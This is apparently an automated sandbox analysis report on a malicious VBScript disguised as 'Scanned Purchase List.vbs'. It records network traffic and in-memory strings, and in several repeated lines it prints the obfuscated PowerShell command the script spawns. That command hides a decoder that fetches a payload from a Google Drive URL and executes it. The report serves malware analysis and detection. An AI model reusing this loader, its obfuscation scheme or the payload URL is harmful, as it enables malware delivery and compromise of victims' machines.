Source: powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD08F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94P
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googhZ
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com(
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0775000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD150D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD096E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFD95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49763 version: TLS 1.2

System Summary

barindex
Source: Initial file: Call ationsvejledninger.ShellExecute(Endovenous, Coraled, "", "", Cheddite)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI Jump to behavior
Source: Scanned Purchase List.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5292
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5292 Jump to behavior
Source: classification engine Classification label: mal92.expl.evad.winVBS@4/5@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Paralytical.Nap Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00datdxo.taw.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Scanned Purchase List.vbs Virustotal: Detection: 12%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
